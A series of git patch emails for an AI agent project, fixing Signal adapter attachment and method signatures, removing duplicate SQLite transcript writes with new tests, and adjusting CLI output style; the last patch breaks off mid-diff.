From: teknium1 <teknium1@gmail.com>
Date: Tue, 10 Mar 2026 14:58:16 -0700
Subject: [PATCH 031/105] fix(signal): use media_urls/media_types instead of
 non-existent image_paths/audio_path/document_paths

The Signal adapter was passing image_paths, audio_path, and document_paths
to MessageEvent.__init__(), but those fields don't exist on the dataclass.
MessageEvent uses media_urls (List[str]) and media_types (List[str]).

Changes:
- Replace separate image_paths/audio_path/document_paths with unified
  media_urls and media_types lists (matching Discord, Slack, etc.)
- Add _ext_to_mime() helper to map file extensions to MIME types
- Use Signal's contentType from attachment metadata when available,
  falling back to extension-based mapping
- Update message type detection to check media_types prefixes

Fixes TypeError: MessageEvent.__init__() got an unexpected keyword
argument 'image_paths'
---
 gateway/platforms/signal.py | 45 +++++++++++++++++++++++--------------
 1 file changed, 28 insertions(+), 17 deletions(-)

diff --git a/gateway/platforms/signal.py b/gateway/platforms/signal.py
index 62e7e4b6..3404bbb9 100644
--- a/gateway/platforms/signal.py
+++ b/gateway/platforms/signal.py
@@ -104,6 +104,20 @@ def _is_audio_ext(ext: str) -> bool:
     return ext.lower() in (".mp3", ".wav", ".ogg", ".m4a", ".aac")
 
 
+_EXT_TO_MIME = {
+    ".jpg": "image/jpeg", ".jpeg": "image/jpeg", ".png": "image/png",
+    ".gif": "image/gif", ".webp": "image/webp",
+    ".ogg": "audio/ogg", ".mp3": "audio/mpeg", ".wav": "audio/wav",
+    ".m4a": "audio/mp4", ".aac": "audio/aac",
+    ".mp4": "video/mp4", ".pdf": "application/pdf", ".zip": "application/zip",
+}
+
+
+def _ext_to_mime(ext: str) -> str:
+    """Map file extension to MIME type."""
+    return _EXT_TO_MIME.get(ext.lower(), "application/octet-stream")
+
+
 def _render_mentions(text: str, mentions: list) -> str:
     """Replace Signal mention placeholders (\\uFFFC) with readable @identifiers.
 
@@ -404,9 +418,8 @@ class SignalAdapter(BasePlatformAdapter):
 
         # Process attachments
         attachments_data = data_message.get("attachments", [])
-        image_paths = []
-        audio_path = None
-        document_paths = []
+        media_urls = []
+        media_types = []
 
         if attachments_data and not getattr(self, "ignore_attachments", False):
             for att in attachments_data:
@@ -420,12 +433,10 @@ class SignalAdapter(BasePlatformAdapter):
                 try:
                     cached_path, ext = await self._fetch_attachment(att_id)
                     if cached_path:
-                        if _is_image_ext(ext):
-                            image_paths.append(cached_path)
-                        elif _is_audio_ext(ext):
-                            audio_path = cached_path
-                        else:
-                            document_paths.append(cached_path)
+                        # Use contentType from Signal if available, else map from extension
+                        content_type = att.get("contentType") or _ext_to_mime(ext)
+                        media_urls.append(cached_path)
+                        media_types.append(content_type)
                 except Exception:
                     logger.exception("Signal: failed to fetch attachment %s", att_id)
 
@@ -440,12 +451,13 @@ class SignalAdapter(BasePlatformAdapter):
             chat_id_alt=group_id if is_group else None,
         )
 
-        # Determine message type
+        # Determine message type from media
         msg_type = MessageType.TEXT
-        if audio_path:
-            msg_type = MessageType.VOICE
-        elif image_paths:
-            msg_type = MessageType.IMAGE
+        if media_types:
+            if any(mt.startswith("audio/") for mt in media_types):
+                msg_type = MessageType.VOICE
+            elif any(mt.startswith("image/") for mt in media_types):
+                msg_type = MessageType.IMAGE
 
         # Parse timestamp from envelope data (milliseconds since epoch)
         ts_ms = envelope_data.get("timestamp", 0)
@@ -462,9 +474,8 @@ class SignalAdapter(BasePlatformAdapter):
             source=source,
             text=text or "",
             message_type=msg_type,
-            image_paths=image_paths,
-            audio_path=audio_path,
-            document_paths=document_paths,
+            media_urls=media_urls,
+            media_types=media_types,
             timestamp=timestamp,
         )
 

From cea78c5e278c3f1bd829cd97acc0f340540d8904 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Tue, 10 Mar 2026 15:08:40 -0700
Subject: [PATCH 032/105] fix(gateway): add metadata param to _keep_typing and
 base send_typing

_keep_typing() was called with metadata= for thread-aware typing
indicators, but neither it nor the base send_typing() accepted
that parameter. Most adapter overrides (Slack, Discord, Telegram,
WhatsApp, HA) already accept metadata=None, but the base class
and Signal adapter did not.

- Add metadata=None to BasePlatformAdapter.send_typing()
- Add metadata=None to BasePlatformAdapter._keep_typing(), pass through
- Add metadata=None to SignalAdapter.send_typing()

Fixes TypeError in _process_message_background for Signal.
---
 gateway/platforms/base.py   | 7 ++++---
 gateway/platforms/signal.py | 2 +-
 2 files changed, 5 insertions(+), 4 deletions(-)

diff --git a/gateway/platforms/base.py b/gateway/platforms/base.py
index c12d417b..1e743618 100644
--- a/gateway/platforms/base.py
+++ b/gateway/platforms/base.py
@@ -413,11 +413,12 @@ class BasePlatformAdapter(ABC):
         """
         return SendResult(success=False, error="Not supported")
 
-    async def send_typing(self, chat_id: str) -> None:
+    async def send_typing(self, chat_id: str, metadata=None) -> None:
         """
         Send a typing indicator.
         
         Override in subclasses if the platform supports it.
+        metadata: optional dict with platform-specific context (e.g. thread_id for Slack).
         """
         pass
     
@@ -620,7 +621,7 @@ class BasePlatformAdapter(ABC):
         
         return media, cleaned
     
-    async def _keep_typing(self, chat_id: str, interval: float = 2.0) -> None:
+    async def _keep_typing(self, chat_id: str, interval: float = 2.0, metadata=None) -> None:
         """
         Continuously send typing indicator until cancelled.
         
@@ -629,7 +630,7 @@ class BasePlatformAdapter(ABC):
         """
         try:
             while True:
-                await self.send_typing(chat_id)
+                await self.send_typing(chat_id, metadata=metadata)
                 await asyncio.sleep(interval)
         except asyncio.CancelledError:
             pass  # Normal cancellation when handler completes
diff --git a/gateway/platforms/signal.py b/gateway/platforms/signal.py
index 3404bbb9..d2212ae8 100644
--- a/gateway/platforms/signal.py
+++ b/gateway/platforms/signal.py
@@ -580,7 +580,7 @@ class SignalAdapter(BasePlatformAdapter):
             return SendResult(success=True)
         return SendResult(success=False, error="RPC send failed")
 
-    async def send_typing(self, chat_id: str) -> None:
+    async def send_typing(self, chat_id: str, metadata=None) -> None:
         """Send a typing indicator."""
         params: Dict[str, Any] = {
             "account": self.account,

From d6ab35c1a3a431e0da8eeae5f25f97782dd52f4f Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Tue, 10 Mar 2026 15:18:26 -0700
Subject: [PATCH 033/105] fix(signal): align send() signature with base class
 (content, reply_to, metadata)

Signal's send() used 'text' instead of 'content' and 'reply_to_message_id'
instead of 'reply_to', mismatching BasePlatformAdapter.send(). Callers in
gateway/run.py use keyword args matching the base interface, so Signal's
send() was missing its required 'text' positional arg.

Fixes: 'SignalAdapter.send() missing 1 required positional argument: text'
---
 gateway/platforms/signal.py | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/gateway/platforms/signal.py b/gateway/platforms/signal.py
index d2212ae8..2ce072ae 100644
--- a/gateway/platforms/signal.py
+++ b/gateway/platforms/signal.py
@@ -557,16 +557,16 @@ class SignalAdapter(BasePlatformAdapter):
     async def send(
         self,
         chat_id: str,
-        text: str,
-        reply_to_message_id: Optional[str] = None,
-        **kwargs,
+        content: str,
+        reply_to: Optional[str] = None,
+        metadata: Optional[Dict[str, Any]] = None,
     ) -> SendResult:
         """Send a text message."""
         await self._stop_typing_indicator(chat_id)
 
         params: Dict[str, Any] = {
             "account": self.account,
-            "message": text,
+            "message": content,
         }
 
         if chat_id.startswith("group:"):

From c1171fe666456ae9028910ca18e6b3d421fa9bd7 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Tue, 10 Mar 2026 15:22:44 -0700
Subject: [PATCH 034/105] fix: eliminate 3x SQLite message duplication in
 gateway sessions (#860)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Three separate code paths all wrote to the same SQLite state.db with
no deduplication, inflating session transcripts by 3-4x:

1. _log_msg_to_db() — wrote each message individually after append
2. _flush_messages_to_session_db() — re-wrote ALL new messages at
   every _persist_session() call (~18 exit points), with no tracking
   of what was already written
3. gateway append_to_transcript() — wrote everything a third time
   after the agent returned

Since load_transcript() prefers SQLite over JSONL, the inflated data
was loaded on every session resume, causing proportional token waste.

Fix:
- Remove _log_msg_to_db() and all 16 call sites (redundant with flush)
- Add _last_flushed_db_idx tracking in _flush_messages_to_session_db()
  so repeated _persist_session() calls only write truly new messages
- Reset flush cursor on compression (new session ID)
- Add skip_db parameter to SessionStore.append_to_transcript() so the
  gateway skips SQLite writes when the agent already persisted them
- Gateway now passes skip_db=True for agent-managed messages, still
  writes to JSONL as backup

Verified: a 12-message CLI session with tool calls produces exactly
12 SQLite rows with zero duplicates (previously would be 36-48).

Tests: 9 new tests covering flush deduplication, skip_db behavior,
compression reset, and initialization. Full suite passes (2869 tests).
---
 gateway/run.py                |   8 +-
 gateway/session.py            |  15 +-
 run_agent.py                  |  58 ++-----
 tests/test_860_dedup.py       | 294 ++++++++++++++++++++++++++++++++++
 tests/tools/test_interrupt.py |   2 +-
 5 files changed, 323 insertions(+), 54 deletions(-)
 create mode 100644 tests/test_860_dedup.py

diff --git a/gateway/run.py b/gateway/run.py
index cd5c9318..d1a639b8 100644
--- a/gateway/run.py
+++ b/gateway/run.py
@@ -1322,6 +1322,11 @@ class GatewayRunner:
                         {"role": "assistant", "content": response, "timestamp": ts}
                     )
             else:
+                # The agent already persisted these messages to SQLite via
+                # _flush_messages_to_session_db(), so skip the DB write here
+                # to prevent the duplicate-write bug (#860).  We still write
+                # to JSONL for backward compatibility and as a backup.
+                agent_persisted = self._session_db is not None
                 for msg in new_messages:
                     # Skip system messages (they're rebuilt each run)
                     if msg.get("role") == "system":
@@ -1329,7 +1334,8 @@ class GatewayRunner:
                     # Add timestamp to each message for debugging
                     entry = {**msg, "timestamp": ts}
                     self.session_store.append_to_transcript(
-                        session_entry.session_id, entry
+                        session_entry.session_id, entry,
+                        skip_db=agent_persisted,
                     )
             
             # Update session
diff --git a/gateway/session.py b/gateway/session.py
index 4c9b48b7..410d2403 100644
--- a/gateway/session.py
+++ b/gateway/session.py
@@ -677,10 +677,17 @@ class SessionStore:
         """Get the path to a session's legacy transcript file."""
         return self.sessions_dir / f"{session_id}.jsonl"
     
-    def append_to_transcript(self, session_id: str, message: Dict[str, Any]) -> None:
-        """Append a message to a session's transcript (SQLite + legacy JSONL)."""
-        # Write to SQLite
-        if self._db:
+    def append_to_transcript(self, session_id: str, message: Dict[str, Any], skip_db: bool = False) -> None:
+        """Append a message to a session's transcript (SQLite + legacy JSONL).
+
+        Args:
+            skip_db: When True, only write to JSONL and skip the SQLite write.
+                     Used when the agent already persisted messages to SQLite
+                     via its own _flush_messages_to_session_db(), preventing
+                     the duplicate-write bug (#860).
+        """
+        # Write to SQLite (unless the agent already handled it)
+        if self._db and not skip_db:
             try:
                 self._db.append_message(
                     session_id=session_id,
diff --git a/run_agent.py b/run_agent.py
index bde681eb..bbcec618 100644
--- a/run_agent.py
+++ b/run_agent.py
@@ -497,6 +497,7 @@ class AIAgent:
         
         # SQLite session store (optional -- provided by CLI or gateway)
         self._session_db = session_db
+        self._last_flushed_db_idx = 0  # tracks DB-write cursor to prevent duplicate writes
         if self._session_db:
             try:
                 self._session_db.create_session(
@@ -802,45 +803,19 @@ class AIAgent:
         self._save_session_log(messages)
         self._flush_messages_to_session_db(messages, conversation_history)
 
-    def _log_msg_to_db(self, msg: Dict):
-        """Log a single message to SQLite immediately. Called after each messages.append()."""
-        if not self._session_db:
-            return
-        try:
-            role = msg.get("role", "unknown")
-            content = msg.get("content")
-            tool_calls_data = None
-            if hasattr(msg, "tool_calls") and msg.tool_calls:
-                tool_calls_data = [
-                    {"name": tc.function.name, "arguments": tc.function.arguments}
-                    for tc in msg.tool_calls
-                ]
-            elif isinstance(msg.get("tool_calls"), list):
-                tool_calls_data = msg["tool_calls"]
-            self._session_db.append_message(
-                session_id=self.session_id,
-                role=role,
-                content=content,
-                tool_name=msg.get("tool_name"),
-                tool_calls=tool_calls_data,
-                tool_call_id=msg.get("tool_call_id"),
-                finish_reason=msg.get("finish_reason"),
-            )
-        except Exception as e:
-            logger.debug("Session DB log_msg failed: %s", e)
-
     def _flush_messages_to_session_db(self, messages: List[Dict], conversation_history: List[Dict] = None):
-        """Persist any un-logged messages to the SQLite session store.
+        """Persist any un-flushed messages to the SQLite session store.
 
-        Called both at the normal end of run_conversation and from every early-
-        return path so that tool calls, tool responses, and assistant messages
-        are never lost even when the conversation errors out.
+        Uses _last_flushed_db_idx to track which messages have already been
+        written, so repeated calls (from multiple exit paths) only write
+        truly new messages — preventing the duplicate-write bug (#860).
         """
         if not self._session_db:
             return
         try:
             start_idx = len(conversation_history) if conversation_history else 0
-            for msg in messages[start_idx:]:
+            flush_from = max(start_idx, self._last_flushed_db_idx)
+            for msg in messages[flush_from:]:
                 role = msg.get("role", "unknown")
                 content = msg.get("content")
                 tool_calls_data = None
@@ -860,6 +835,7 @@ class AIAgent:
                     tool_call_id=msg.get("tool_call_id"),
                     finish_reason=msg.get("finish_reason"),
                 )
+            self._last_flushed_db_idx = len(messages)
         except Exception as e:
             logger.debug("Session DB append_message failed: %s", e)
 
@@ -2689,6 +2665,8 @@ class AIAgent:
                     except (ValueError, Exception) as e:
                         logger.debug("Could not propagate title on compression: %s", e)
                 self._session_db.update_system_prompt(self.session_id, new_system_prompt)
+                # Reset flush cursor — new session starts with no messages written
+                self._last_flushed_db_idx = 0
             except Exception as e:
                 logger.debug("Session DB compression split failed: %s", e)
 
@@ -2712,7 +2690,6 @@ class AIAgent:
                         "tool_call_id": skipped_tc.id,
                     }
                     messages.append(skip_msg)
-                    self._log_msg_to_db(skip_msg)
                 break
 
             function_name = tool_call.function.name
@@ -2921,7 +2898,6 @@ class AIAgent:
                 "tool_call_id": tool_call.id
             }
             messages.append(tool_msg)
-            self._log_msg_to_db(tool_msg)
 
             if not self.quiet_mode:
                 response_preview = function_result[:self.log_prefix_chars] + "..." if len(function_result) > self.log_prefix_chars else function_result
@@ -2938,7 +2914,6 @@ class AIAgent:
                         "tool_call_id": skipped_tc.id
                     }
                     messages.append(skip_msg)
-                    self._log_msg_to_db(skip_msg)
                 break
 
             if self.tool_delay > 0 and i < len(assistant_message.tool_calls):
@@ -3169,7 +3144,6 @@ class AIAgent:
         # Add user message
         user_msg = {"role": "user", "content": user_message}
         messages.append(user_msg)
-        self._log_msg_to_db(user_msg)
         
         if not self.quiet_mode:
             print(f"💬 Starting conversation: '{user_message[:60]}{'...' if len(user_message) > 60 else ''}'")
@@ -3572,7 +3546,6 @@ class AIAgent:
                                 length_continue_retries += 1
                                 interim_msg = self._build_assistant_message(assistant_message, finish_reason)
                                 messages.append(interim_msg)
-                                self._log_msg_to_db(interim_msg)
                                 if assistant_message.content:
                                     truncated_response_prefix += assistant_message.content
 
@@ -3590,7 +3563,6 @@ class AIAgent:
                                         ),
                                     }
                                     messages.append(continue_msg)
-                                    self._log_msg_to_db(continue_msg)
                                     self._session_messages = messages
                                     self._save_session_log(messages)
                                     restart_with_length_continuation = True
@@ -4063,7 +4035,6 @@ class AIAgent:
                         )
                         if not duplicate_interim:
                             messages.append(interim_msg)
-                            self._log_msg_to_db(interim_msg)
 
                     if self._codex_incomplete_retries < 3:
                         if not self.quiet_mode:
@@ -4114,7 +4085,6 @@ class AIAgent:
                         print(f"{self.log_prefix}⚠️  Unknown tool '{invalid_preview}' — sending error to model for self-correction")
                         assistant_msg = self._build_assistant_message(assistant_message, finish_reason)
                         messages.append(assistant_msg)
-                        self._log_msg_to_db(assistant_msg)
                         for tc in assistant_message.tool_calls:
                             if tc.function.name not in self.valid_tool_names:
                                 content = f"Tool '{tc.function.name}' does not exist. Available tools: {available}"
@@ -4169,7 +4139,6 @@ class AIAgent:
                             )
                             recovery_dict = {"role": "user", "content": recovery_msg}
                             messages.append(recovery_dict)
-                            self._log_msg_to_db(recovery_dict)
                             continue
                     
                     # Reset retry counter on successful JSON validation
@@ -4191,7 +4160,6 @@ class AIAgent:
                                 print(f"  ┊ 💬 {clean}")
                     
                     messages.append(assistant_msg)
-                    self._log_msg_to_db(assistant_msg)
                     
                     self._execute_tool_calls(assistant_message, messages, effective_task_id)
 
@@ -4292,7 +4260,6 @@ class AIAgent:
                                 "finish_reason": finish_reason,
                             }
                             messages.append(empty_msg)
-                            self._log_msg_to_db(empty_msg)
                             
                             self._cleanup_task_resources(effective_task_id)
                             self._persist_session(messages, conversation_history)
@@ -4323,7 +4290,6 @@ class AIAgent:
                         codex_ack_continuations += 1
                         interim_msg = self._build_assistant_message(assistant_message, "incomplete")
                         messages.append(interim_msg)
-                        self._log_msg_to_db(interim_msg)
 
                         continue_msg = {
                             "role": "user",
@@ -4333,7 +4299,6 @@ class AIAgent:
                             ),
                         }
                         messages.append(continue_msg)
-                        self._log_msg_to_db(continue_msg)
                         self._session_messages = messages
                         self._save_session_log(messages)
                         continue
@@ -4349,7 +4314,6 @@ class AIAgent:
                     final_msg = self._build_assistant_message(assistant_message, finish_reason)
                     
                     messages.append(final_msg)
-                    self._log_msg_to_db(final_msg)
                     
                     if not self.quiet_mode:
                         print(f"🎉 Conversation completed after {api_call_count} OpenAI-compatible API call(s)")
@@ -4386,7 +4350,6 @@ class AIAgent:
                                     "content": f"Error executing tool: {error_msg}",
                                 }
                                 messages.append(err_msg)
-                                self._log_msg_to_db(err_msg)
                         pending_handled = True
                     break
                 
@@ -4399,7 +4362,6 @@ class AIAgent:
                         "content": f"[System error during processing: {error_msg}]",
                     }
                     messages.append(sys_err_msg)
-                    self._log_msg_to_db(sys_err_msg)
                 
                 # If we're near the limit, break to avoid infinite loops
                 if api_call_count >= self.max_iterations - 1:
diff --git a/tests/test_860_dedup.py b/tests/test_860_dedup.py
new file mode 100644
index 00000000..350d2a21
--- /dev/null
+++ b/tests/test_860_dedup.py
@@ -0,0 +1,294 @@
+"""Tests for issue #860 — SQLite session transcript deduplication.
+
+Verifies that:
+1. _flush_messages_to_session_db uses _last_flushed_db_idx to avoid re-writing
+2. Multiple _persist_session calls don't duplicate messages
+3. append_to_transcript(skip_db=True) skips SQLite but writes JSONL
+4. The gateway doesn't double-write messages the agent already persisted
+"""
+
+import json
+import os
+import sqlite3
+import tempfile
+from pathlib import Path
+from unittest.mock import MagicMock, patch
+
+import pytest
+
+
+# ---------------------------------------------------------------------------
+# Test: _flush_messages_to_session_db only writes new messages
+# ---------------------------------------------------------------------------
+
+class TestFlushDeduplication:
+    """Verify _flush_messages_to_session_db tracks what it already wrote."""
+
+    def _make_agent(self, session_db):
+        """Create a minimal AIAgent with a real session DB."""
+        with patch.dict(os.environ, {"OPENROUTER_API_KEY": "test-key"}):
+            from run_agent import AIAgent
+            agent = AIAgent(
+                model="test/model",
+                quiet_mode=True,
+                session_db=session_db,
+                session_id="test-session-860",
+                skip_context_files=True,
+                skip_memory=True,
+            )
+        return agent
+
+    def test_flush_writes_only_new_messages(self):
+        """First flush writes all new messages, second flush writes none."""
+        from hermes_state import SessionDB
+
+        with tempfile.TemporaryDirectory() as tmpdir:
+            db_path = Path(tmpdir) / "test.db"
+            db = SessionDB(db_path=db_path)
+
+            agent = self._make_agent(db)
+
+            conversation_history = [
+                {"role": "user", "content": "old message"},
+            ]
+            messages = list(conversation_history) + [
+                {"role": "user", "content": "new question"},
+                {"role": "assistant", "content": "new answer"},
+            ]
+
+            # First flush — should write 2 new messages
+            agent._flush_messages_to_session_db(messages, conversation_history)
+
+            rows = db.get_messages(agent.session_id)
+            assert len(rows) == 2, f"Expected 2 messages, got {len(rows)}"
+
+            # Second flush with SAME messages — should write 0 new messages
+            agent._flush_messages_to_session_db(messages, conversation_history)
+
+            rows = db.get_messages(agent.session_id)
+            assert len(rows) == 2, f"Expected still 2 messages after second flush, got {len(rows)}"
+
+    def test_flush_writes_incrementally(self):
+        """Messages added between flushes are written exactly once."""
+        from hermes_state import SessionDB
+
+        with tempfile.TemporaryDirectory() as tmpdir:
+            db_path = Path(tmpdir) / "test.db"
+            db = SessionDB(db_path=db_path)
+
+            agent = self._make_agent(db)
+
+            conversation_history = []
+            messages = [
+                {"role": "user", "content": "hello"},
+            ]
+
+            # First flush — 1 message
+            agent._flush_messages_to_session_db(messages, conversation_history)
+            rows = db.get_messages(agent.session_id)
+            assert len(rows) == 1
+
+            # Add more messages
+            messages.append({"role": "assistant", "content": "hi there"})
+            messages.append({"role": "user", "content": "follow up"})
+
+            # Second flush — should write only 2 new messages
+            agent._flush_messages_to_session_db(messages, conversation_history)
+            rows = db.get_messages(agent.session_id)
+            assert len(rows) == 3, f"Expected 3 total messages, got {len(rows)}"
+
+    def test_persist_session_multiple_calls_no_duplication(self):
+        """Multiple _persist_session calls don't duplicate DB entries."""
+        from hermes_state import SessionDB
+
+        with tempfile.TemporaryDirectory() as tmpdir:
+            db_path = Path(tmpdir) / "test.db"
+            db = SessionDB(db_path=db_path)
+
+            agent = self._make_agent(db)
+            # Stub out _save_session_log to avoid file I/O
+            agent._save_session_log = MagicMock()
+
+            conversation_history = [{"role": "user", "content": "old"}]
+            messages = list(conversation_history) + [
+                {"role": "user", "content": "q1"},
+                {"role": "assistant", "content": "a1"},
+                {"role": "user", "content": "q2"},
+                {"role": "assistant", "content": "a2"},
+            ]
+
+            # Simulate multiple persist calls (like the agent's many exit paths)
+            for _ in range(5):
+                agent._persist_session(messages, conversation_history)
+
+            rows = db.get_messages(agent.session_id)
+            assert len(rows) == 4, f"Expected 4 messages, got {len(rows)} (duplication bug!)"
+
+    def test_flush_reset_after_compression(self):
+        """After compression creates a new session, flush index resets."""
+        from hermes_state import SessionDB
+
+        with tempfile.TemporaryDirectory() as tmpdir:
+            db_path = Path(tmpdir) / "test.db"
+            db = SessionDB(db_path=db_path)
+
+            agent = self._make_agent(db)
+
+            # Write some messages
+            messages = [
+                {"role": "user", "content": "msg1"},
+                {"role": "assistant", "content": "reply1"},
+            ]
+            agent._flush_messages_to_session_db(messages, [])
+
+            old_session = agent.session_id
+            assert agent._last_flushed_db_idx == 2
+
+            # Simulate what _compress_context does: new session, reset idx
+            agent.session_id = "compressed-session-new"
+            db.create_session(session_id=agent.session_id, source="test")
+            agent._last_flushed_db_idx = 0
+
+            # Now flush compressed messages to new session
+            compressed_messages = [
+                {"role": "user", "content": "summary of conversation"},
+            ]
+            agent._flush_messages_to_session_db(compressed_messages, [])
+
+            new_rows = db.get_messages(agent.session_id)
+            assert len(new_rows) == 1
+
+            # Old session should still have its 2 messages
+            old_rows = db.get_messages(old_session)
+            assert len(old_rows) == 2
+
+
+# ---------------------------------------------------------------------------
+# Test: append_to_transcript skip_db parameter
+# ---------------------------------------------------------------------------
+
+class TestAppendToTranscriptSkipDb:
+    """Verify skip_db=True writes JSONL but not SQLite."""
+
+    @pytest.fixture()
+    def store(self, tmp_path):
+        from gateway.config import GatewayConfig
+        from gateway.session import SessionStore
+        config = GatewayConfig()
+        with patch("gateway.session.SessionStore._ensure_loaded"):
+            s = SessionStore(sessions_dir=tmp_path, config=config)
+        s._db = None  # no SQLite for these JSONL-focused tests
+        s._loaded = True
+        return s
+
+    def test_skip_db_writes_jsonl_only(self, store, tmp_path):
+        """With skip_db=True, message appears in JSONL but not SQLite."""
+        session_id = "test-skip-db"
+        msg = {"role": "assistant", "content": "hello world"}
+        store.append_to_transcript(session_id, msg, skip_db=True)
+
+        # JSONL should have the message
+        jsonl_path = store.get_transcript_path(session_id)
+        assert jsonl_path.exists()
+        with open(jsonl_path) as f:
+            lines = f.readlines()
+        assert len(lines) == 1
+        parsed = json.loads(lines[0])
+        assert parsed["content"] == "hello world"
+
+    def test_skip_db_prevents_sqlite_write(self, tmp_path):
+        """With skip_db=True and a real DB, message does NOT appear in SQLite."""
+        from gateway.config import GatewayConfig
+        from gateway.session import SessionStore
+        from hermes_state import SessionDB
+
+        db_path = tmp_path / "test_skip.db"
+        db = SessionDB(db_path=db_path)
+
+        config = GatewayConfig()
+        with patch("gateway.session.SessionStore._ensure_loaded"):
+            store = SessionStore(sessions_dir=tmp_path, config=config)
+        store._db = db
+        store._loaded = True
+
+        session_id = "test-skip-db-real"
+        db.create_session(session_id=session_id, source="test")
+
+        msg = {"role": "assistant", "content": "hello world"}
+        store.append_to_transcript(session_id, msg, skip_db=True)
+
+        # SQLite should NOT have the message
+        rows = db.get_messages(session_id)
+        assert len(rows) == 0, f"Expected 0 DB rows with skip_db=True, got {len(rows)}"
+
+        # But JSONL should have it
+        jsonl_path = store.get_transcript_path(session_id)
+        with open(jsonl_path) as f:
+            lines = f.readlines()
+        assert len(lines) == 1
+
+    def test_default_writes_both(self, tmp_path):
+        """Without skip_db, message appears in both JSONL and SQLite."""
+        from gateway.config import GatewayConfig
+        from gateway.session import SessionStore
+        from hermes_state import SessionDB
+
+        db_path = tmp_path / "test_both.db"
+        db = SessionDB(db_path=db_path)
+
+        config = GatewayConfig()
+        with patch("gateway.session.SessionStore._ensure_loaded"):
+            store = SessionStore(sessions_dir=tmp_path, config=config)
+        store._db = db
+        store._loaded = True
+
+        session_id = "test-default-write"
+        db.create_session(session_id=session_id, source="test")
+
+        msg = {"role": "user", "content": "test message"}
+        store.append_to_transcript(session_id, msg)
+
+        # JSONL should have the message
+        jsonl_path = store.get_transcript_path(session_id)
+        with open(jsonl_path) as f:
+            lines = f.readlines()
+        assert len(lines) == 1
+
+        # SQLite should also have the message
+        rows = db.get_messages(session_id)
+        assert len(rows) == 1
+
+
+# ---------------------------------------------------------------------------
+# Test: _last_flushed_db_idx initialization
+# ---------------------------------------------------------------------------
+
+class TestFlushIdxInit:
+    """Verify _last_flushed_db_idx is properly initialized."""
+
+    def test_init_zero(self):
+        """Agent starts with _last_flushed_db_idx = 0."""
+        with patch.dict(os.environ, {"OPENROUTER_API_KEY": "test-key"}):
+            from run_agent import AIAgent
+            agent = AIAgent(
+                model="test/model",
+                quiet_mode=True,
+                skip_context_files=True,
+                skip_memory=True,
+            )
+        assert agent._last_flushed_db_idx == 0
+
+    def test_no_session_db_noop(self):
+        """Without session_db, flush is a no-op and doesn't crash."""
+        with patch.dict(os.environ, {"OPENROUTER_API_KEY": "test-key"}):
+            from run_agent import AIAgent
+            agent = AIAgent(
+                model="test/model",
+                quiet_mode=True,
+                skip_context_files=True,
+                skip_memory=True,
+            )
+        messages = [{"role": "user", "content": "test"}]
+        agent._flush_messages_to_session_db(messages, [])
+        # Should not crash, idx should remain 0
+        assert agent._last_flushed_db_idx == 0
diff --git a/tests/tools/test_interrupt.py b/tests/tools/test_interrupt.py
index 71990442..6165deaa 100644
--- a/tests/tools/test_interrupt.py
+++ b/tests/tools/test_interrupt.py
@@ -88,7 +88,7 @@ class TestPreToolCheck:
         agent = MagicMock()
         agent._interrupt_requested = True
         agent.log_prefix = ""
-        agent._log_msg_to_db = MagicMock()
+        agent._persist_session = MagicMock()
 
         # Import and call the method
         from run_agent import AIAgent

From ad7a16dca64a502adffe109193d1ea32a3533a04 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Tue, 10 Mar 2026 15:59:08 -0700
Subject: [PATCH 035/105] fix: remove left/right borders from response box for
 easier copy-paste
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Use rich_box.HORIZONTALS instead of the default ROUNDED box style
for the agent response panel. This keeps the top/bottom horizontal
rules (with title) but removes the vertical │ borders on left and
right, making it much easier to copy-paste response text from the
terminal.
---
 cli.py | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/cli.py b/cli.py
index 338d2f72..357a3759 100755
--- a/cli.py
+++ b/cli.py
@@ -396,6 +396,7 @@ try:
 except Exception:
     pass  # Skin engine is optional — default skin used if unavailable
 
+from rich import box as rich_box
 from rich.console import Console
 from rich.panel import Panel
 from rich.table import Table
@@ -3340,6 +3341,7 @@ class HermesCLI:
                     title=f"[bold]{label}[/bold]",
                     title_align="left",
                     border_style=_resp_color,
+                    box=rich_box.HORIZONTALS,
                     padding=(1, 2),
                 ))
             

From a458b535c97fdd3548a1a4002dca64a762aca4fb Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Tue, 10 Mar 2026 16:25:41 -0700
Subject: [PATCH 036/105] =?UTF-8?q?fix:=20improve=20read-loop=20detection?=
 =?UTF-8?q?=20=E2=80=94=20consecutive-only,=20correct=20thresholds,=20fix?=
 =?UTF-8?q?=20bugs?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Follow-up to PR #705 (merged from 0xbyt4). Addresses several issues:

1. CONSECUTIVE-ONLY TRACKING: Redesigned the read/search tracker to only
   warn/block on truly consecutive identical calls. Any other tool call
   in between (write, patch, terminal, etc.) resets the counter via
   notify_other_tool_call(), called from handle_function_call() in
   model_tools.py. This prevents false blocks in read→edit→verify flows.

2. THRESHOLD ADJUSTMENT: Warn on 3rd consecutive (was 2nd), block on
   4th+ consecutive (was 3rd+). Gives the model more room before
   intervening.

3. TUPLE UNPACKING BUG: Fixed get_read_files_summary() which crashed on
   search keys (5-tuple) when trying to unpack as 3-tuple. Now uses a
   separate read_history set that only tracks file reads.

4. WEB_EXTRACT DOCSTRING: Reverted incorrect removal of 'title' from
   web_extract return docs in code_execution_tool.py — the field IS
   returned by web_tools.py.

5. TESTS: Rewrote test_read_loop_detection.py (35 tests) to cover
   consecutive-only behavior, notify_other_tool_call, interleaved
   read/search, and summary-unaffected-by-searches.
---
 model_tools.py                          |  10 ++
 tests/tools/test_read_loop_detection.py | 176 ++++++++++++++++++++----
 tools/code_execution_tool.py            |   4 +-
 tools/file_tools.py                     |  88 ++++++++----
 4 files changed, 223 insertions(+), 55 deletions(-)

diff --git a/model_tools.py b/model_tools.py
index a2fd68c4..2139eb08 100644
--- a/model_tools.py
+++ b/model_tools.py
@@ -284,6 +284,16 @@ def handle_function_call(
     Returns:
         Function result as a JSON string.
     """
